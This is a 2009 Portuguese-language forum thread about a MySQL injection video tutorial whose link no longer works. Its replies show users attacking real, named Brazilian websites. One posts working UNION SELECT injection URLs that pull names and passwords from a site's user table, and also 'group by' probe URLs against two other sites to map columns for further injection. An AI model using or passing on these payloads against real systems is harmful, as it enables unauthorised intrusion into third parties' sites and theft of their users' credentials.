MySQL Injection explicado.

por **log_22** em 11 Mai 2009, 11:56

Nesta video-aula, explico como se aproveitar de falhas nos filtros das páginas injetando caracteres no seu GET, antes de assistirem queria dizer que antes que tentem gravar os comandos da video-aula, tentem entender a falha, como e quando ela acontece, pois ownar por ownar não é legal.

Obrigado e boa aprendizagem

Link para a video-aula:

**Publicidade**

por **Marcelo Moraes** em 11 Mai 2009, 20:32

Opa Log,

Mandou bem cara .

por **rmk90** em 11 Mai 2009, 20:48

Opa cara, maneiro.

Mas fiquei com 2 dúvidas.

1- Sites q possuem esse erro "Notice: Undefined index: in /home/httpd/vhosts/estudioeletrico.com.br/httpdocs/functions.php on line 109"
são vulneraveis? se quiser dar uma chegada no site http://estudioeletrico.com.br/index.php?id=68' ou http://www.agenciapulsar.org/coberturas_det2.php?id=45'

2- Comecei a testar em alguns sites na internet, teve um q consegui ver a senha mas nao obtive sucesso no login.Gostaria q me desse uma ajuda, só me deizer onde esta o meu erro.
http://www.ibict.br/noticia.php?id=-1+u ... m+usuarios

ps: testei com todos os tipos possiveis de nome para user
user
users
usuario
usuarios
member
members
login
name
...

abraço!

Meu Orkut · por **Otávio Ribeiro** em 11 Mai 2009, 20:57

Cara,

Nem todo programador é iniciante, Ele colocou o primeiro usuário da tabela do banco de dados sem privilégios administrativos. Portanto não ira poder fazer o loguin.

http://www.ibict.br/noticia.php?id=-469+union+all+select+nome,senha+from+usuarios--

[s]
- Otávio

por **rmk90** em 11 Mai 2009, 21:07

Ah intendi Otávio.
Mas então teria que ter mais usuarios?! certo!?
Só q quando tu vai testar quantas tabelas possui o site ele diz só 2.

Ah e obrigado por ter respondido a minha dúvida no outro tópico.

Meu Orkut · por **Otávio Ribeiro** em 11 Mai 2009, 21:13

Cara,

Sim o site so possui duas tabelas veja abaixo ele vai te mostrar a senha é o usuário, porém e como citei logo acima sobre o administrador não ser iniciante:

http://www.ibict.br/noticia.php?id=-469+union+all+select+nome,senha+from+usuarios--

Quando a ter mais usuários, sim teria mais até hoje não vi nenhum método para descobrir os outros usuários do banco de dados, já olhei em fórums estrangeiros e também não encontrei.

[s]
- Otávio

por **rmk90** em 11 Mai 2009, 21:37

Nossa, acredita que não testei a tag 'nome'. haha

Saquei, e em relação a segunda dúvida, tu sabe me dizer se os sites q possuem aquele erro tambem são vulneraveis?

Meu Orkut · por **Otávio Ribeiro** em 11 Mai 2009, 23:01

Cara,

Sim estão vulneráveis, porém você tera que utilizar os comandos information_schema para achar o nome do banco de dados.

http://estudioeletrico.com.br/pagina.php?id=60+group+by+11

http://www.agenciapulsar.org/coberturas_det2.php?id=45+group+by+5

]['s, Otávio Ribeiro

por **badgateway** em 15 Mai 2009, 17:31

Olá, log_22 será que poderia postar novamente o video...
Obrigado! (:

abraço!

por **log_22** em 15 Mai 2009, 21:39

Editado, bons estudos amigos.

por **mousefun** em 14 Ago 2009, 16:30

link off